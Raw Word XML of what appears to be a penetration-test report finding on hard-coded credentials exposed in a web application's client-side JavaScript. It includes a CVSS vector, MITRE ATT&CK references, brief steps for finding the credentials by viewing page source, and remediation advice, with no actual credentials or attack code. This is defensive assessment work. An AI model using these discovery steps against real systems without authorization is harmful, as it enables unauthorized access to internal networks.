      <w:bookmarkStart w:name="_Toc1984712411" w:id="2074537263"/>
      <w:bookmarkStart w:name="_Toc974600115" w:id="308498326"/>
      <w:bookmarkStart w:name="_Toc409118689" w:id="1473123668"/>
      <w:bookmarkStart w:name="_Toc1926063848" w:id="1534031903"/>
      <w:bookmarkStart w:name="_Toc1829536862" w:id="1844271513"/>
      <w:bookmarkStart w:name="_Toc1372102442" w:id="1027305188"/>
      <w:bookmarkStart w:name="_Toc469601737" w:id="832205573"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="08947F3D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hard-Coded Credentials in </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="08947F3D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Application</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1990018057"/>
      <w:bookmarkEnd w:id="2074537263"/>
      <w:bookmarkEnd w:id="308498326"/>
      <w:bookmarkEnd w:id="1473123668"/>
      <w:bookmarkEnd w:id="1534031903"/>
      <w:bookmarkEnd w:id="1844271513"/>
      <w:bookmarkEnd w:id="1027305188"/>
      <w:bookmarkEnd w:id="832205573"/>
      <w:bookmarkEnd w:id="106626508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541D77A5">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E5D1B2" w14:textId="7CAE251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D8E493" w14:textId="180B8B1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315008" w14:textId="0CA4C9A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048034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1F51B0" w14:textId="1F77A20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3D5FD39" w14:textId="409A5ED1">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B9035F3" w:rsidP="0D325B6E" w:rsidRDefault="2B9035F3" w14:paraId="1C0B4F84" w14:textId="4CC0F2A0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="2B9035F3">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>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46D5620A" w14:textId="00C494BB">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0AEB7910">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DF3FCF" w14:textId="0478C65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3DE3B6EC" w14:textId="70E6E9A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9830B97"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4335" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78EF0A33"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="07108C0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B8C29E" w14:textId="2B36B38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CBA697D" w:rsidP="0D325B6E" w:rsidRDefault="5CBA697D" w14:paraId="15D91F54" w14:textId="2CE8E757">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" r:id="Raa0ef85d444b4d0a">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5CBA697D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AV:N/AC:L/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="03FCFB07">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/S</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5CBA697D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>A:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7DA2588A">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38C09C" w14:textId="114C306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A0CCFAB" w:rsidP="0D325B6E" w:rsidRDefault="2A0CCFAB" w14:paraId="155E3084" w14:textId="6246A873">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2A0CCFAB">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7C78AFE" w:rsidP="0D325B6E" w:rsidRDefault="27C78AFE" w14:paraId="37831421" w14:textId="394376B2">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rad5187fc4e444684">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="27C78AFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T0891: Hardcoded Credentials</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="560AD7B8" w14:textId="285AC674">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rb8c728520d234382">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>078</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="313F58DF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>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 Valid Accounts</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3D3D9EDE">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552D2B3E"/>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3733B54" w:rsidP="0D325B6E" w:rsidRDefault="63733B54" w14:paraId="7A36C73C" w14:textId="5EBAE4C1">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="63733B54">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DC9D719" w:rsidP="0D325B6E" w:rsidRDefault="7DC9D719" w14:paraId="170A7AC2" w14:textId="10A6CBCA">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Ra14d2cf31f334891">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7DC9D719">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M0801: Access Management</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="5524F1E9">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97D962" w14:textId="14098198">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8859233" w14:textId="4EC7A82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0AAE7EA1" w14:textId="46C3BBDB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="08947F3D" w:rsidP="0D325B6E" w:rsidRDefault="08947F3D" w14:paraId="151B86E1" w14:textId="1932EB8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0AB6AC1" w:rsidP="0D325B6E" w:rsidRDefault="10AB6AC1" w14:paraId="159A4233" w14:textId="32612F2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0AB6AC1">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10AB6AC1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="10AB6AC1">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on </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="10AB6AC1">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MACHINE1</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="10AB6AC1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizes hard-coded credentials found in the application’s </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="10AB6AC1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="10AB6AC1">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3A86169">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">client-side </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="10AB6AC1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>code.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="27AA03D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This exposes valid credentials to anyone with access to the website, allowing attackers to authenticate as an </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="22866965">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>internal</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="27AA03D9">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w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="519BC1DC" w14:textId="07CA71C8">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8947F3D" w:rsidP="0D325B6E" w:rsidRDefault="08947F3D" w14:paraId="0878BD45" w14:textId="7BADE8F7">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8947F3D">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8947F3D" w:rsidP="0D325B6E" w:rsidRDefault="08947F3D" w14:paraId="74030C10" w14:textId="115AEC2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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="21492397">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ED1C669">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">these client-side credentials to gain a foothold into the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6BCFB1D8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>internal</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5ED1C669">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> network. This can lead to unauthorized access to internal APIs or systems, exposing sensitive </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="38AA91E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="38AA91E5">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ED1C669">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and enabling further compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6F8438A4" w14:textId="23F91D00">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08947F3D" w:rsidP="0D325B6E" w:rsidRDefault="08947F3D" w14:paraId="1E2D62F4" w14:textId="212A572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8947F3D" w:rsidP="0D325B6E" w:rsidRDefault="08947F3D" w14:paraId="621EBF19" w14:textId="6132CEC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D325B6E" w:rsidR="08947F3D">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w:rsidR="08947F3D" w:rsidP="0D325B6E" w:rsidRDefault="08947F3D" w14:paraId="11453AA5" w14:textId="0660265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4FF7C8BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Press</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4FF7C8BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CTRL + U to view the page source code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4FF7C8BF" w:rsidP="0D325B6E" w:rsidRDefault="4FF7C8BF" w14:paraId="2229348D" w14:textId="68EECCE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F7C8BF">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FF7C8BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tep 3: View hard-coded credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="69ADD84F" w14:textId="0A5FABC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8947F3D" w:rsidP="0D325B6E" w:rsidRDefault="08947F3D" w14:paraId="3DEE47F4" w14:textId="59C1459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8947F3D" w:rsidP="0D325B6E" w:rsidRDefault="08947F3D" w14:paraId="3D42FC29" w14:textId="3632B8E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8947F3D">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1323FBCF">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1323FBCF" w:rsidP="0D325B6E" w:rsidRDefault="1323FBCF" w14:paraId="5853B33A" w14:textId="1D82541F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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323FBCF">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5EE11D49">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>emov</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="782A5E12">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5EE11D49">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> all hard-coded credentials from client-side code. Never include test or debug credentials in files deployed to production, instead use environment variables or secure credential stores to manage secrets safely. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52461D17" w:rsidP="0D325B6E" w:rsidRDefault="52461D17" w14:paraId="50EC15E5" w14:textId="09CF29E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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2461D17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use secure secret management and coding practices by storing all sensitive credentials in environment variables, configu</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3FC9644D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ration files </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="12CD8951">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>outside Webroot</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3FC9644D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, or in centralized secret management systems.</w:t>
      </w:r>
    </w:p>
